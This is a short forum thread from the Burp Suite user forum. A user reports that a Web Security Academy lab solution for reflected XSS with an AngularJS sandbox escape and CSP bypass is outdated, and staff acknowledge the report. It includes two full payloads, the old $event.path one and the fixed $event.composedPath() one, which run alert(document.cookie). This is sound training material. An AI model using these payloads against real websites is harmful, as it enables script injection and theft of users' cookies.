Burp Suite User Forum

Login to post

Wrong solution in WSA Expert lab XSS: Reflected XSS with AngularJS sandbox escape and CSP

Aetius | Last updated: Jan 19, 2023 09:42PM UTC

Hello, in the WSA Lab titled 'Reflected XSS with AngularJS sandbox escape and CSP', the solution section is wrong because it suggests this payload: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; But as mentioned at the end of one of your publications (https://portswigger.net/research/angularjs-csp-bypass-in-56-characters) 'Since Chrome 109 the path property has been removed. The workaround is to use composedPath() instead.'. So the new solution is: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; I tested both in my up-to-date Chrome browser and also in the lab: only the solution containing $event.composedPath() instead of $event.path works and validates the challenge so you should correct it in the writeup. Thank you for your amazing learning material!

Michelle, PortSwigger Agent | Last updated: Jan 20, 2023 02:46PM UTC

Thanks for getting in touch :) We'll pass this on to the team.

You need to Log in to post a reply. Or register here, for free.